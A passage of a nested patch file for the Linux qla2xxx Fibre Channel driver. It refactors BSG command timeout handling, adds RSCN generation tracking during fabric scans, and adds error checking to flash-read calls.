++			if (!ha->flags.eeh_busy && ha->isp_ops->abort_command(sp)) {
++				ql_log(ql_log_warn, vha, 0x7089,
++						"mbx abort_command failed.\n");
++				bsg_reply->result = -EIO;
++			} else {
++				ql_dbg(ql_dbg_user, vha, 0x708a,
++						"mbx abort_command success.\n");
++				bsg_reply->result = 0;
++			}
++			/* ref: INIT */
++			kref_put(&sp->cmd_kref, qla2x00_sp_release);
++
++			found = true;
++			goto done;
++		}
++	}
++	spin_unlock_irqrestore(qpair->qp_lock_ptr, flags);
++
++done:
++	return found;
++}
++
++int
++qla24xx_bsg_timeout(struct bsg_job *bsg_job)
++{
++	struct fc_bsg_reply *bsg_reply = bsg_job->reply;
++	scsi_qla_host_t *vha = shost_priv(fc_bsg_to_shost(bsg_job));
++	struct qla_hw_data *ha = vha->hw;
++	int i;
++	struct qla_qpair *qpair;
++
+ 	ql_log(ql_log_info, vha, 0x708b, "%s CMD timeout. bsg ptr %p.\n",
+ 	    __func__, bsg_job);
+ 
+@@ -3079,48 +3123,22 @@ qla24xx_bsg_timeout(struct bsg_job *bsg_job)
+ 		qla_pci_set_eeh_busy(vha);
+ 	}
+ 
++	if (qla_bsg_found(ha->base_qpair, bsg_job))
++		goto done;
++
+ 	/* find the bsg job from the active list of commands */
+-	spin_lock_irqsave(&ha->hardware_lock, flags);
+-	for (que = 0; que < ha->max_req_queues; que++) {
+-		req = ha->req_q_map[que];
+-		if (!req)
++	for (i = 0; i < ha->max_qpairs; i++) {
++		qpair = vha->hw->queue_pair_map[i];
++		if (!qpair)
+ 			continue;
+-
+-		for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+-			sp = req->outstanding_cmds[cnt];
+-			if (sp &&
+-			    (sp->type == SRB_CT_CMD ||
+-			     sp->type == SRB_ELS_CMD_HST ||
+-			     sp->type == SRB_ELS_CMD_HST_NOLOGIN ||
+-			     sp->type == SRB_FXIOCB_BCMD) &&
+-			    sp->u.bsg_job == bsg_job) {
+-				req->outstanding_cmds[cnt] = NULL;
+-				spin_unlock_irqrestore(&ha->hardware_lock, flags);
+-
+-				if (!ha->flags.eeh_busy && ha->isp_ops->abort_command(sp)) {
+-					ql_log(ql_log_warn, vha, 0x7089,
+-					    "mbx abort_command failed.\n");
+-					bsg_reply->result = -EIO;
+-				} else {
+-					ql_dbg(ql_dbg_user, vha, 0x708a,
+-					    "mbx abort_command success.\n");
+-					bsg_reply->result = 0;
+-				}
+-				spin_lock_irqsave(&ha->hardware_lock, flags);
+-				goto done;
+-
+-			}
+-		}
++		if (qla_bsg_found(qpair, bsg_job))
++			goto done;
+ 	}
+-	spin_unlock_irqrestore(&ha->hardware_lock, flags);
++
+ 	ql_log(ql_log_info, vha, 0x708b, "SRB not found to abort.\n");
+ 	bsg_reply->result = -ENXIO;
+-	return 0;
+ 
+ done:
+-	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+-	/* ref: INIT */
+-	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 31c451daeeb82..8490181424c75 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -3278,6 +3278,8 @@ struct fab_scan_rp {
+ struct fab_scan {
+ 	struct fab_scan_rp *l;
+ 	u32 size;
++	u32 rscn_gen_start;
++	u32 rscn_gen_end;
+ 	u16 scan_retry;
+ #define MAX_SCAN_RETRIES 5
+ 	enum scan_flags_t scan_flags;
+@@ -4985,6 +4987,7 @@ typedef struct scsi_qla_host {
+ 
+ 	/* Counter to detect races between ELS and RSCN events */
+ 	atomic_t		generation_tick;
++	atomic_t		rscn_gen;
+ 	/* Time when global fcport update has been scheduled */
+ 	int			total_fcport_update_gen;
+ 	/* List of pending LOGOs, protected by tgt_mutex */
+diff --git a/drivers/scsi/qla2xxx/qla_gs.c b/drivers/scsi/qla2xxx/qla_gs.c
+index 64ab070b87166..9c707d677f648 100644
+--- a/drivers/scsi/qla2xxx/qla_gs.c
++++ b/drivers/scsi/qla2xxx/qla_gs.c
+@@ -1710,7 +1710,7 @@ qla2x00_hba_attributes(scsi_qla_host_t *vha, void *entries,
+ 	eiter->type = cpu_to_be16(FDMI_HBA_OPTION_ROM_VERSION);
+ 	alen = scnprintf(
+ 		eiter->a.orom_version, sizeof(eiter->a.orom_version),
+-		"%d.%02d", ha->bios_revision[1], ha->bios_revision[0]);
++		"%d.%02d", ha->efi_revision[1], ha->efi_revision[0]);
+ 	alen += FDMI_ATTR_ALIGNMENT(alen);
+ 	alen += FDMI_ATTR_TYPELEN(eiter);
+ 	eiter->len = cpu_to_be16(alen);
+@@ -3465,6 +3465,29 @@ static int qla2x00_is_a_vp(scsi_qla_host_t *vha, u64 wwn)
+ 	return rc;
+ }
+ 
++static bool qla_ok_to_clear_rscn(scsi_qla_host_t *vha, fc_port_t *fcport)
++{
++	u32 rscn_gen;
++
++	rscn_gen = atomic_read(&vha->rscn_gen);
++	ql_dbg(ql_dbg_disc + ql_dbg_verbose, vha, 0x2017,
++	    "%s %d %8phC rscn_gen %x start %x end %x current %x\n",
++	    __func__, __LINE__, fcport->port_name, fcport->rscn_gen,
++	    vha->scan.rscn_gen_start, vha->scan.rscn_gen_end, rscn_gen);
++
++	if (val_is_in_range(fcport->rscn_gen, vha->scan.rscn_gen_start,
++	    vha->scan.rscn_gen_end))
++		/* rscn came in before fabric scan */
++		return true;
++
++	if (val_is_in_range(fcport->rscn_gen, vha->scan.rscn_gen_end, rscn_gen))
++		/* rscn came in after fabric scan */
++		return false;
++
++	/* rare: fcport's scan_needed + rscn_gen must be stale */
++	return true;
++}
++
+ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ {
+ 	fc_port_t *fcport;
+@@ -3578,10 +3601,10 @@ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ 				   (fcport->scan_needed &&
+ 				    fcport->port_type != FCT_INITIATOR &&
+ 				    fcport->port_type != FCT_NVME_INITIATOR)) {
++				fcport->scan_needed = 0;
+ 				qlt_schedule_sess_for_deletion(fcport);
+ 			}
+ 			fcport->d_id.b24 = rp->id.b24;
+-			fcport->scan_needed = 0;
+ 			break;
+ 		}
+ 
+@@ -3622,7 +3645,9 @@ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ 				do_delete = true;
+ 			}
+ 
+-			fcport->scan_needed = 0;
++			if (qla_ok_to_clear_rscn(vha, fcport))
++				fcport->scan_needed = 0;
++
+ 			if (((qla_dual_mode_enabled(vha) ||
+ 			      qla_ini_mode_enabled(vha)) &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE) ||
+@@ -3652,7 +3677,9 @@ void qla24xx_async_gnnft_done(scsi_qla_host_t *vha, srb_t *sp)
+ 					    fcport->port_name, fcport->loop_id,
+ 					    fcport->login_retry);
+ 				}
+-				fcport->scan_needed = 0;
++
++				if (qla_ok_to_clear_rscn(vha, fcport))
++					fcport->scan_needed = 0;
+ 				qla24xx_fcport_handle_login(vha, fcport);
+ 			}
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 6dce3f166564c..a65c601608209 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1843,10 +1843,18 @@ int qla24xx_post_newsess_work(struct scsi_qla_host *vha, port_id_t *id,
+ 	return qla2x00_post_work(vha, e);
+ }
+ 
++static void qla_rscn_gen_tick(scsi_qla_host_t *vha, u32 *ret_rscn_gen)
++{
++	*ret_rscn_gen = atomic_inc_return(&vha->rscn_gen);
++	/* memory barrier */
++	wmb();
++}
++
+ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ {
+ 	fc_port_t *fcport;
+ 	unsigned long flags;
++	u32 rscn_gen;
+ 
+ 	switch (ea->id.b.rsvd_1) {
+ 	case RSCN_PORT_ADDR:
+@@ -1876,15 +1884,16 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 					 * Otherwise we're already in the middle of a relogin
+ 					 */
+ 					fcport->scan_needed = 1;
+-					fcport->rscn_gen++;
++					qla_rscn_gen_tick(vha, &fcport->rscn_gen);
+ 				}
+ 			} else {
+ 				fcport->scan_needed = 1;
+-				fcport->rscn_gen++;
++				qla_rscn_gen_tick(vha, &fcport->rscn_gen);
+ 			}
+ 		}
+ 		break;
+ 	case RSCN_AREA_ADDR:
++		qla_rscn_gen_tick(vha, &rscn_gen);
+ 		list_for_each_entry(fcport, &vha->vp_fcports, list) {
+ 			if (fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE)
+@@ -1892,11 +1901,12 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 
+ 			if ((ea->id.b24 & 0xffff00) == (fcport->d_id.b24 & 0xffff00)) {
+ 				fcport->scan_needed = 1;
+-				fcport->rscn_gen++;
++				fcport->rscn_gen = rscn_gen;
+ 			}
+ 		}
+ 		break;
+ 	case RSCN_DOM_ADDR:
++		qla_rscn_gen_tick(vha, &rscn_gen);
+ 		list_for_each_entry(fcport, &vha->vp_fcports, list) {
+ 			if (fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE)
+@@ -1904,19 +1914,20 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 
+ 			if ((ea->id.b24 & 0xff0000) == (fcport->d_id.b24 & 0xff0000)) {
+ 				fcport->scan_needed = 1;
+-				fcport->rscn_gen++;
++				fcport->rscn_gen = rscn_gen;
+ 			}
+ 		}
+ 		break;
+ 	case RSCN_FAB_ADDR:
+ 	default:
++		qla_rscn_gen_tick(vha, &rscn_gen);
+ 		list_for_each_entry(fcport, &vha->vp_fcports, list) {
+ 			if (fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE)
+ 				continue;
+ 
+ 			fcport->scan_needed = 1;
+-			fcport->rscn_gen++;
++			fcport->rscn_gen = rscn_gen;
+ 		}
+ 		break;
+ 	}
+@@ -1925,6 +1936,7 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 	if (vha->scan.scan_flags == 0) {
+ 		ql_dbg(ql_dbg_disc, vha, 0xffff, "%s: schedule\n", __func__);
+ 		vha->scan.scan_flags |= SF_QUEUED;
++		vha->scan.rscn_gen_start = atomic_read(&vha->rscn_gen);
+ 		schedule_delayed_work(&vha->scan.scan_work, 5);
+ 	}
+ 	spin_unlock_irqrestore(&vha->work_lock, flags);
+@@ -6419,6 +6431,8 @@ qla2x00_configure_fabric(scsi_qla_host_t *vha)
+ 		qlt_do_generation_tick(vha, &discovery_gen);
+ 
+ 		if (USE_ASYNC_SCAN(ha)) {
++			/* start of scan begins here */
++			vha->scan.rscn_gen_end = atomic_read(&vha->rscn_gen);
+ 			rval = qla24xx_async_gpnft(vha, FC4_TYPE_FCP_SCSI,
+ 			    NULL);
+ 			if (rval)
+@@ -8260,15 +8274,21 @@ qla28xx_get_aux_images(
+ 	struct qla27xx_image_status pri_aux_image_status, sec_aux_image_status;
+ 	bool valid_pri_image = false, valid_sec_image = false;
+ 	bool active_pri_image = false, active_sec_image = false;
++	int rc;
+ 
+ 	if (!ha->flt_region_aux_img_status_pri) {
+ 		ql_dbg(ql_dbg_init, vha, 0x018a, "Primary aux image not addressed\n");
+ 		goto check_sec_image;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, (uint32_t *)&pri_aux_image_status,
++	rc = qla24xx_read_flash_data(vha, (uint32_t *)&pri_aux_image_status,
+ 	    ha->flt_region_aux_img_status_pri,
+ 	    sizeof(pri_aux_image_status) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a1,
++		    "Unable to read Primary aux image(%x).\n", rc);
++		goto check_sec_image;
++	}
+ 	qla27xx_print_image(vha, "Primary aux image", &pri_aux_image_status);
+ 
+ 	if (qla28xx_check_aux_image_status_signature(&pri_aux_image_status)) {
+@@ -8299,9 +8319,15 @@ qla28xx_get_aux_images(
+ 		goto check_valid_image;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, (uint32_t *)&sec_aux_image_status,
++	rc = qla24xx_read_flash_data(vha, (uint32_t *)&sec_aux_image_status,
+ 	    ha->flt_region_aux_img_status_sec,
+ 	    sizeof(sec_aux_image_status) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a2,
++		    "Unable to read Secondary aux image(%x).\n", rc);
++		goto check_valid_image;
++	}
++
+ 	qla27xx_print_image(vha, "Secondary aux image", &sec_aux_image_status);
+ 
+ 	if (qla28xx_check_aux_image_status_signature(&sec_aux_image_status)) {
+@@ -8359,6 +8385,7 @@ qla27xx_get_active_image(struct scsi_qla_host *vha,
+ 	struct qla27xx_image_status pri_image_status, sec_image_status;
+ 	bool valid_pri_image = false, valid_sec_image = false;
+ 	bool active_pri_image = false, active_sec_image = false;
++	int rc;
+ 
+ 	if (!ha->flt_region_img_status_pri) {
+ 		ql_dbg(ql_dbg_init, vha, 0x018a, "Primary image not addressed\n");
+@@ -8400,8 +8427,14 @@ qla27xx_get_active_image(struct scsi_qla_host *vha,
+ 		goto check_valid_image;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, (uint32_t *)(&sec_image_status),
++	rc = qla24xx_read_flash_data(vha, (uint32_t *)(&sec_image_status),
+ 	    ha->flt_region_img_status_sec, sizeof(sec_image_status) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a3,
++		    "Unable to read Secondary image status(%x).\n", rc);
++		goto check_valid_image;
++	}
++
+ 	qla27xx_print_image(vha, "Secondary image", &sec_image_status);
+ 
+ 	if (qla27xx_check_image_status_signature(&sec_image_status)) {
+@@ -8473,11 +8506,10 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 	    "FW: Loading firmware from flash (%x).\n", faddr);
+ 
+ 	dcode = (uint32_t *)req->ring;
+-	qla24xx_read_flash_data(vha, dcode, faddr, 8);
+-	if (qla24xx_risc_firmware_invalid(dcode)) {
++	rval = qla24xx_read_flash_data(vha, dcode, faddr, 8);
++	if (rval || qla24xx_risc_firmware_invalid(dcode)) {
+ 		ql_log(ql_log_fatal, vha, 0x008c,
+-		    "Unable to verify the integrity of flash firmware "
+-		    "image.\n");
++		    "Unable to verify the integrity of flash firmware image (rval %x).\n", rval);
+ 		ql_log(ql_log_fatal, vha, 0x008d,
+ 		    "Firmware data: %08x %08x %08x %08x.\n",
+ 		    dcode[0], dcode[1], dcode[2], dcode[3]);
+@@ -8491,7 +8523,12 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 	for (j = 0; j < segments; j++) {
+ 		ql_dbg(ql_dbg_init, vha, 0x008d,
+ 		    "-> Loading segment %u...\n", j);
+-		qla24xx_read_flash_data(vha, dcode, faddr, 10);
++		rval = qla24xx_read_flash_data(vha, dcode, faddr, 10);
++		if (rval) {
++			ql_log(ql_log_fatal, vha, 0x016a,
++			    "-> Unable to read segment addr + size .\n");
++			return QLA_FUNCTION_FAILED;
++		}
+ 		risc_addr = be32_to_cpu((__force __be32)dcode[2]);
+ 		risc_size = be32_to_cpu((__force __be32)dcode[3]);
+ 		if (!*srisc_addr) {
+@@ -8507,7 +8544,13 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 			ql_dbg(ql_dbg_init, vha, 0x008e,
+ 			    "-> Loading fragment %u: %#x <- %#x (%#lx dwords)...\n",
+ 			    fragment, risc_addr, faddr, dlen);
+-			qla24xx_read_flash_data(vha, dcode, faddr, dlen);
++			rval = qla24xx_read_flash_data(vha, dcode, faddr, dlen);
++			if (rval) {
++				ql_log(ql_log_fatal, vha, 0x016b,
++				    "-> Unable to read fragment(faddr %#x dlen %#lx).\n",
++				    faddr, dlen);
++				return QLA_FUNCTION_FAILED;
++			}
+ 			for (i = 0; i < dlen; i++)
+ 				dcode[i] = swab32(dcode[i]);
+ 
+@@ -8536,7 +8579,14 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 		fwdt->length = 0;
+ 
+ 		dcode = (uint32_t *)req->ring;
+-		qla24xx_read_flash_data(vha, dcode, faddr, 7);
++
++		rval = qla24xx_read_flash_data(vha, dcode, faddr, 7);
++		if (rval) {
++			ql_log(ql_log_fatal, vha, 0x016c,
++			    "-> Unable to read template size.\n");
++			goto failed;
++		}
++
+ 		risc_size = be32_to_cpu((__force __be32)dcode[2]);
+ 		ql_dbg(ql_dbg_init, vha, 0x0161,
+ 		    "-> fwdt%u template array at %#x (%#x dwords)\n",
+@@ -8562,11 +8612,12 @@ qla24xx_load_risc_flash(scsi_qla_host_t *vha, uint32_t *srisc_addr,
+ 		}
+ 
+ 		dcode = fwdt->template;
+-		qla24xx_read_flash_data(vha, dcode, faddr, risc_size);
++		rval = qla24xx_read_flash_data(vha, dcode, faddr, risc_size);
+ 
+-		if (!qla27xx_fwdt_template_valid(dcode)) {
++		if (rval || !qla27xx_fwdt_template_valid(dcode)) {
+ 			ql_log(ql_log_warn, vha, 0x0165,
+-			    "-> fwdt%u failed template validate\n", j);
++			    "-> fwdt%u failed template validate (rval %x)\n",
++			    j, rval);
+ 			goto failed;
+ 		}
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index a4a56ab0ba747..ef4b3cc1cd77e 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -631,3 +631,11 @@ static inline int qla_mapq_alloc_qp_cpu_map(struct qla_hw_data *ha)
+ 	}
+ 	return 0;
+ }
++
++static inline bool val_is_in_range(u32 val, u32 start, u32 end)
++{
++	if (val >= start && val <= end)
++		return true;
++	else
++		return false;
++}
+diff --git a/drivers/scsi/qla2xxx/qla_mid.c b/drivers/scsi/qla2xxx/qla_mid.c
+index 16a9f22bb8600..9e8df452ee145 100644
+--- a/drivers/scsi/qla2xxx/qla_mid.c
++++ b/drivers/scsi/qla2xxx/qla_mid.c
+@@ -180,7 +180,7 @@ qla24xx_disable_vp(scsi_qla_host_t *vha)
+ 	atomic_set(&vha->loop_state, LOOP_DOWN);
+ 	atomic_set(&vha->loop_down_timer, LOOP_DOWN_TIME);
+ 	list_for_each_entry(fcport, &vha->vp_fcports, list)
+-		fcport->logout_on_delete = 0;
++		fcport->logout_on_delete = 1;
+ 
+ 	if (!vha->hw->flags.edif_enabled)
+ 		qla2x00_wait_for_sess_deletion(vha);
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 9941b38eac93c..622b11660b67c 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -29,7 +29,10 @@ int qla_nvme_register_remote(struct scsi_qla_host *vha, struct fc_port *fcport)
+ 		return 0;
+ 	}
+ 
+-	if (!vha->nvme_local_port && qla_nvme_register_hba(vha))
++	if (qla_nvme_register_hba(vha))
++		return 0;
++
++	if (!vha->nvme_local_port)
+ 		return 0;
+ 
+ 	if (!(fcport->nvme_prli_service_param &
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 25d0c2bfdd742..41a7ffaabfd1e 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -1869,14 +1869,9 @@ __qla2x00_abort_all_cmds(struct qla_qpair *qp, int res)
+ 	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+ 		sp = req->outstanding_cmds[cnt];
+ 		if (sp) {
+-			/*
+-			 * perform lockless completion during driver unload
+-			 */
+ 			if (qla2x00_chip_is_down(vha)) {
+ 				req->outstanding_cmds[cnt] = NULL;
+-				spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
+ 				sp->done(sp, res);
+-				spin_lock_irqsave(qp->qp_lock_ptr, flags);
+ 				continue;
+ 			}
+ 
+@@ -4667,7 +4662,7 @@ static void
+ qla2x00_number_of_exch(scsi_qla_host_t *vha, u32 *ret_cnt, u16 max_cnt)
+ {
+ 	u32 temp;
+-	struct init_cb_81xx *icb = (struct init_cb_81xx *)&vha->hw->init_cb;
++	struct init_cb_81xx *icb = (struct init_cb_81xx *)vha->hw->init_cb;
+ 	*ret_cnt = FW_DEF_EXCHANGES_CNT;
+ 
+ 	if (max_cnt > vha->hw->max_exchg)
+diff --git a/drivers/scsi/qla2xxx/qla_sup.c b/drivers/scsi/qla2xxx/qla_sup.c
+index c092a6b1ced4f..6d16546e17292 100644
+--- a/drivers/scsi/qla2xxx/qla_sup.c
++++ b/drivers/scsi/qla2xxx/qla_sup.c
+@@ -555,6 +555,7 @@ qla2xxx_find_flt_start(scsi_qla_host_t *vha, uint32_t *start)
+ 	struct qla_flt_location *fltl = (void *)req->ring;
+ 	uint32_t *dcode = (uint32_t *)req->ring;
+ 	uint8_t *buf = (void *)req->ring, *bcode,  last_image;
++	int rc;
+ 
+ 	/*
+ 	 * FLT-location structure resides after the last PCI region.
+@@ -584,14 +585,24 @@ qla2xxx_find_flt_start(scsi_qla_host_t *vha, uint32_t *start)
+ 	pcihdr = 0;
+ 	do {
+ 		/* Verify PCI expansion ROM header. */
+-		qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		rc = qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		if (rc) {
++			ql_log(ql_log_info, vha, 0x016d,
++			    "Unable to read PCI Expansion Rom Header (%x).\n", rc);
++			return QLA_FUNCTION_FAILED;
++		}
+ 		bcode = buf + (pcihdr % 4);
+ 		if (bcode[0x0] != 0x55 || bcode[0x1] != 0xaa)
+ 			goto end;
+ 
+ 		/* Locate PCI data structure. */
+ 		pcids = pcihdr + ((bcode[0x19] << 8) | bcode[0x18]);
+-		qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		rc = qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		if (rc) {
++			ql_log(ql_log_info, vha, 0x0179,
++			    "Unable to read PCI Data Structure (%x).\n", rc);
++			return QLA_FUNCTION_FAILED;
++		}
+ 		bcode = buf + (pcihdr % 4);
+ 
+ 		/* Validate signature of PCI data structure. */
+@@ -606,7 +617,12 @@ qla2xxx_find_flt_start(scsi_qla_host_t *vha, uint32_t *start)
+ 	} while (!last_image);
+ 
+ 	/* Now verify FLT-location structure. */
+-	qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, sizeof(*fltl) >> 2);
++	rc = qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, sizeof(*fltl) >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x017a,
++		    "Unable to read FLT (%x).\n", rc);
++		return QLA_FUNCTION_FAILED;
++	}
+ 	if (memcmp(fltl->sig, "QFLT", 4))
+ 		goto end;
+ 
+@@ -2605,13 +2621,18 @@ qla24xx_read_optrom_data(struct scsi_qla_host *vha, void *buf,
+     uint32_t offset, uint32_t length)
+ {
+ 	struct qla_hw_data *ha = vha->hw;
++	int rc;
+ 
+ 	/* Suspend HBA. */
+ 	scsi_block_requests(vha->host);
+ 	set_bit(MBX_UPDATE_FLASH_ACTIVE, &ha->mbx_cmd_flags);
+ 
+ 	/* Go with read. */
+-	qla24xx_read_flash_data(vha, buf, offset >> 2, length >> 2);
++	rc = qla24xx_read_flash_data(vha, buf, offset >> 2, length >> 2);
++	if (rc) {
++		ql_log(ql_log_info, vha, 0x01a0,
++		    "Unable to perform optrom read(%x).\n", rc);
++	}
+ 
+ 	/* Resume HBA. */
+ 	clear_bit(MBX_UPDATE_FLASH_ACTIVE, &ha->mbx_cmd_flags);
+@@ -3412,7 +3433,7 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 	struct active_regions active_regions = { };
+ 
+ 	if (IS_P3P_TYPE(ha))
+-		return ret;
++		return QLA_SUCCESS;
+ 
+ 	if (!mbuf)
+ 		return QLA_FUNCTION_FAILED;
+@@ -3432,20 +3453,31 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 
+ 	do {
+ 		/* Verify PCI expansion ROM header. */
+-		qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		ret = qla24xx_read_flash_data(vha, dcode, pcihdr >> 2, 0x20);
++		if (ret) {
++			ql_log(ql_log_info, vha, 0x017d,
++			    "Unable to read PCI EXP Rom Header(%x).\n", ret);
++			return QLA_FUNCTION_FAILED;
++		}
++
+ 		bcode = mbuf + (pcihdr % 4);
+ 		if (memcmp(bcode, "\x55\xaa", 2)) {
+ 			/* No signature */
+ 			ql_log(ql_log_fatal, vha, 0x0059,
+ 			    "No matching ROM signature.\n");
+-			ret = QLA_FUNCTION_FAILED;
+-			break;
++			return QLA_FUNCTION_FAILED;
+ 		}
+ 
+ 		/* Locate PCI data structure. */
+ 		pcids = pcihdr + ((bcode[0x19] << 8) | bcode[0x18]);
+ 
+-		qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		ret = qla24xx_read_flash_data(vha, dcode, pcids >> 2, 0x20);
++		if (ret) {
++			ql_log(ql_log_info, vha, 0x018e,
++			    "Unable to read PCI Data Structure (%x).\n", ret);
++			return QLA_FUNCTION_FAILED;
++		}
++
+ 		bcode = mbuf + (pcihdr % 4);
+ 
+ 		/* Validate signature of PCI data structure. */
+@@ -3454,8 +3486,7 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 			ql_log(ql_log_fatal, vha, 0x005a,
+ 			    "PCI data struct not found pcir_adr=%x.\n", pcids);
+ 			ql_dump_buffer(ql_dbg_init, vha, 0x0059, dcode, 32);
+-			ret = QLA_FUNCTION_FAILED;
+-			break;
++			return QLA_FUNCTION_FAILED;
+ 		}
+ 
+ 		/* Read version */
+@@ -3507,20 +3538,26 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 			faddr = ha->flt_region_fw_sec;
+ 	}
+ 
+-	qla24xx_read_flash_data(vha, dcode, faddr, 8);
+-	if (qla24xx_risc_firmware_invalid(dcode)) {
+-		ql_log(ql_log_warn, vha, 0x005f,
+-		    "Unrecognized fw revision at %x.\n",
+-		    ha->flt_region_fw * 4);
+-		ql_dump_buffer(ql_dbg_init, vha, 0x005f, dcode, 32);
++	ret = qla24xx_read_flash_data(vha, dcode, faddr, 8);
++	if (ret) {
++		ql_log(ql_log_info, vha, 0x019e,
++		    "Unable to read FW version (%x).\n", ret);
++		return ret;
+ 	} else {
+-		for (i = 0; i < 4; i++)
+-			ha->fw_revision[i] =
++		if (qla24xx_risc_firmware_invalid(dcode)) {
++			ql_log(ql_log_warn, vha, 0x005f,
++			    "Unrecognized fw revision at %x.\n",
++			    ha->flt_region_fw * 4);
++			ql_dump_buffer(ql_dbg_init, vha, 0x005f, dcode, 32);
++		} else {
++			for (i = 0; i < 4; i++)
++				ha->fw_revision[i] =
+ 				be32_to_cpu((__force __be32)dcode[4+i]);
+-		ql_dbg(ql_dbg_init, vha, 0x0060,
+-		    "Firmware revision (flash) %u.%u.%u (%x).\n",
+-		    ha->fw_revision[0], ha->fw_revision[1],
+-		    ha->fw_revision[2], ha->fw_revision[3]);
++			ql_dbg(ql_dbg_init, vha, 0x0060,
++			    "Firmware revision (flash) %u.%u.%u (%x).\n",
++			    ha->fw_revision[0], ha->fw_revision[1],
++			    ha->fw_revision[2], ha->fw_revision[3]);
++		}
+ 	}
+ 
+ 	/* Check for golden firmware and get version if available */
+@@ -3531,18 +3568,23 @@ qla24xx_get_flash_version(scsi_qla_host_t *vha, void *mbuf)
+ 
+ 	memset(ha->gold_fw_version, 0, sizeof(ha->gold_fw_version));
+ 	faddr = ha->flt_region_gold_fw;
+-	qla24xx_read_flash_data(vha, dcode, ha->flt_region_gold_fw, 8);
+-	if (qla24xx_risc_firmware_invalid(dcode)) {
+-		ql_log(ql_log_warn, vha, 0x0056,
+-		    "Unrecognized golden fw at %#x.\n", faddr);
+-		ql_dump_buffer(ql_dbg_init, vha, 0x0056, dcode, 32);
++	ret = qla24xx_read_flash_data(vha, dcode, ha->flt_region_gold_fw, 8);
++	if (ret) {
++		ql_log(ql_log_info, vha, 0x019f,
++		    "Unable to read Gold FW version (%x).\n", ret);
+ 		return ret;
+-	}
+-
+-	for (i = 0; i < 4; i++)
+-		ha->gold_fw_version[i] =
+-			be32_to_cpu((__force __be32)dcode[4+i]);
++	} else {
++		if (qla24xx_risc_firmware_invalid(dcode)) {
++			ql_log(ql_log_warn, vha, 0x0056,
++			    "Unrecognized golden fw at %#x.\n", faddr);
++			ql_dump_buffer(ql_dbg_init, vha, 0x0056, dcode, 32);
++			return QLA_FUNCTION_FAILED;
++		}
+ 
++		for (i = 0; i < 4; i++)
++			ha->gold_fw_version[i] =
++			   be32_to_cpu((__force __be32)dcode[4+i]);
++	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/qcom/pdr_interface.c b/drivers/soc/qcom/pdr_interface.c
+index 0034af927b488..c7cd4daa10b0f 100644
+--- a/drivers/soc/qcom/pdr_interface.c
++++ b/drivers/soc/qcom/pdr_interface.c
+@@ -76,12 +76,12 @@ static int pdr_locator_new_server(struct qmi_handle *qmi,
+ 					      locator_hdl);
